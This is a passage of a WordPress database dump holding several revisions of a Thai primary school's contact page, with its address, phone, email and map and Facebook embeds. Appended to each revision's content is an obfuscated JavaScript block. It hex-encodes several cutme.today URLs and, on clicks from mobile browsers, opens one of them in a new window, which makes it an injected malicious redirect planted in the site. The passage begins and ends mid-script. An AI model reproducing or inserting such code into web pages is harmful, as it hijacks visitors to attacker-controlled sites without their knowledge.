Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-06 21:58:52','2024-08-06 14:58:52','',362,'http://pakhaeng.ssk.in.th/?p=580',0,'revision','',0),
(582,1,'2024-08-06 22:00:47','2024-08-06 15:00:47','<!-- wp:heading {\"level\":1,\"style\":{\"elements\":{\"link\":{\"color\":{\"text\":\"var:preset|color|white\"}}}},\"backgroundColor\":\"luminous-vivid-orange\",\"textColor\":\"white\",\"fontSize\":\"small\"} -->\n<h1 class=\"wp-block-heading has-white-color has-luminous-vivid-orange-background-color has-text-color has-background has-link-color has-small-font-size\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>แผนที่ตั้ง</strong></a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>ติดตามเราได้ที่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3c91321e\",\"isDynamic\":true,\"blockVersion\":4} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-06 22:00:47','2024-08-06 15:00:47','',362,'http://pakhaeng.ssk.in.th/?p=582',0,'revision','',0),
(584,1,'2024-08-06 22:04:24','2024-08-06 15:04:24','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"vivid-cyan-blue\",\"width\":100,\"className\":\"is-style-outline\",\"style\":{\"border\":{\"radius\":\"19px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100 is-style-outline\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background wp-element-button\" style=\"border-radius:19px\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-cyan-blue\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-cyan-blue-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>แผนที่ตั้ง</strong></a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>ติดตามเราได้ที่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3c91321e\",\"isDynamic\":true,\"blockVersion\":4} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 